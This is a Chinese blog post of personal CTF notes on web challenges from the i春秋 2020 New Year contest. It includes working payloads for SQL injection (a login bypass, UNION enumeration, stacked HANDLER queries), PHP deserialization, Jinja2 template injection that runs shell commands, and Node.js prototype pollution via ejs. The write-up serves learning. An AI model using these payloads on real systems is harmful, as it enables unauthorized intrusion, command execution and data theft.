CTF笔记(一)——i春秋2020新春公益赛【未完】

前言

本来是不打算写CTF的,但是发现自己总是记不住,没办法了

简单的招聘系统

知识点:万能钥匙
靶机:
Payload:

登录:
lname=%27%3D0--+&lpass=
查询:
' union select 1,database(),3,4,5;#
' union select 1,count(table_name),3,4,5 from information_schema.tables where table_schema='nzhaopin';#
' union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='flag' and table_schema='nzhaopin';#
' union select 1,flaaag,3,4,5 from flag;#
babyPHP

知识点:php反序列化溢出
靶机:http://server.icystal.top/index.php
参考链接:https://www.cnblogs.com/wangtanzhi/p/11908422.html
Payload:

payload = '";s:8:"nickname";O:4:"User":2:{s:3:"age";s:76:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username="admin"";s:8:"nickname";O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:1:"2";s:8:"CtrlCase";O:6:"dbCtrl":2:{s:8:"password";s:1:"1";s:4:"name";s:5:"admin";}}}s:8:"CtrlCase";N;}'
payload='age='+'alter'*len(payload)+payload
sqlicopy
知识点:据说是宽字节注入+堆叠
靶机:http://server.icystal.top/sqlicopy.php
参考链接:https://blog.csdn.net/qq_40648358/article/details/104456748
Payload:不会
Blacklist

知识点:sql Handler
靶机:https://buuoj.cn/challenges#[GYCTF2020]Blacklist
参考链接:https://www.cnblogs.com/chrysanthemum/p/11657008.html
     https://blog.csdn.net/qq_26406447/article/details/90643951
     https://blog.csdn.net/weixin_40871137/article/details/94349532
Payload:

?inject=';show tables;show columns from FlagHere;handler FlagHere open as h;handler h read first;--
Ezsqli
知识点:无需in的SQL盲注
FlaskAPP
知识点:jinjia2 模板注入 ssti
靶机:
Payload:
{{().__class__.__bases__[0].__subclasses__()[78].__init__.__globals__['__builtins__']['ev'+'al']('__im'+'port__("o'+'s").po'+'pen("cat this_is_the_fl'+'ag.txt")').read()}}
Ez_Express
知识点:上车 js原型链污染+字母大小写的骚操作+ejs模板的源码
注册登录:
username=admın
action:
Content-Type: application/json
{"__proto__":{"outputFunctionName":"a;global.process.mainModule.require('child_process').exec('cat /flag > /app/public/flag\"');//"}}
node game

知识点:nodejs http.get ssrf
靶机:https://buuoj.cn/challenges#[GYCTF2020]Node%20Game
参考链接:https://xz.aliyun.com/t/2894
     http://blog.5am3.com/2020/02/11/ctf-node1/
Payload:不会,贴一下群里大佬的待日后研究

彩蛋∑(っ°Д°;)っ

标签:, , , , , , , , , ,

不说点什么喵?

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据